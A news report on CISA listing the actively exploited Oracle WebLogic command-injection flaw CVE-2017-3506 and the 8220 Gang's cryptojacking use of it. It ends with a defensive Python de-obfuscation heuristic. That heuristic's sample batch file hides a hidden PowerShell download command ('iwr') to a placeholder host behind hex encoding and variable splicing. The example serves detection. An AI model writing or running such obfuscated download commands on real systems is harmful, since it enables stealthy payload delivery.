The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a security flaw impacting the Oracle WebLogic Server to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
Tracked as CVE-2017-3506 (CVSS score: 7.4), the issue concerns an operating system (OS) command injection vulnerability that could be exploited to obtain unauthorized access to susceptible servers and take complete control.
“Oracle WebLogic Server, a product within the Fusion Middleware suite, contains an OS command injection vulnerability that allows an attacker to execute arbitrary code via a specially crafted HTTP request that includes a malicious XML document,” CISA said.
While the agency did not disclose the nature of the attacks exploiting the vulnerability, the China-based cryptojacking group known as the 8220 Gang (aka Water Sigbin) has a history of leveraging it since early last year to co-opt unpatched devices into a crypto-mining botnet.
According to a recent report published by Trend Micro, the 8220 Gang has been observed weaponizing flaws in the Oracle WebLogic server (CVE-2017-3506 and CVE-2023-21839) to launch a cryptocurrency miner filelessly in memory via a shell or PowerShell script, depending on the operating system targeted.
“The gang employed obfuscation techniques, such as hexadecimal encoding of URLs and using HTTP over port 443, allowing for stealthy payload delivery,” security researcher Sunil Bharti said. “The PowerShell script and the resulting batch file involved complex encoding, using environment variables to hide malicious code within seemingly benign script components.”
In light of the active exploitation of CVE-2017-3506, federal agencies are recommended to apply the latest fixes by June 24, 2024, to protect their networks against potential threats.
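As an added defender-side example (not code from the Trend Micro report, CISA, or this article), the Python heuristics below undo the two script-level tricks described above, hex-encoded URLs and commands spliced together from batch environment variables, and report what only becomes visible after de-obfuscation. The sample batch file, the documentation-range address 203.0.113.9, and all function names are constructed assumptions for illustration.

```python
import re

# Constructed sample batch file (not from the report): the interpreter name is
# spliced from environment variables and the download URL is hex-escaped, so
# neither appears in clear text on any single line.
SAMPLE_BATCH = r"""
set a=powe
set b=rshell
set u=\x68\x74\x74\x70\x73\x3a\x2f\x2f\x32\x30\x33\x2e\x30\x2e\x31\x31\x33\x2e\x39\x3a\x34\x34\x33\x2f\x78\x2e\x70\x73\x31
%a%%b% -nop -w hidden -c "iwr %u%"
"""

HEX_RUN = re.compile(r"(?:(?:\\x|%)[0-9a-fA-F]{2}){8,}")  # 8+ escaped bytes in a row
SET_VAR = re.compile(r"^\s*set\s+(\w+)=(.*)$", re.I | re.M)
VAR_REF = re.compile(r"%(\w+)%")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
INTERP = re.compile(r"\b(powershell|cmd|certutil|bitsadmin|mshta)\b", re.I)

def expand_batch_vars(text):
    """Resolve %name% references using the script's own 'set' lines."""
    env = dict(SET_VAR.findall(text))
    out = []
    for line in text.splitlines():
        if SET_VAR.match(line):
            continue  # drop definitions; keep only the lines that execute
        out.append(VAR_REF.sub(lambda m: env.get(m.group(1), m.group(0)), line))
    return "\n".join(out)

def _decode_run(m):
    raw = re.sub(r"\\x|%", "", m.group(0))
    try:
        return bytes.fromhex(raw).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return m.group(0)  # not printable text; leave the run untouched

def deobfuscate(text):
    """Variable splicing first, then hex decoding of whatever that exposes."""
    return HEX_RUN.sub(_decode_run, expand_batch_vars(text))

def find_hidden_urls(text):
    """URLs that become visible only after de-obfuscation."""
    return sorted(set(URL_RE.findall(deobfuscate(text))) - set(URL_RE.findall(text)))

def hidden_interpreters(text):
    """Interpreter names that appear only once the variables are spliced."""
    before = {m.lower() for m in INTERP.findall(text)}
    after = {m.lower() for m in INTERP.findall(deobfuscate(text))}
    return sorted(after - before)
```

A non-empty result from either function is a useful triage signal: a URL or interpreter name that a script goes out of its way to hide from a line-by-line reader is rarely benign.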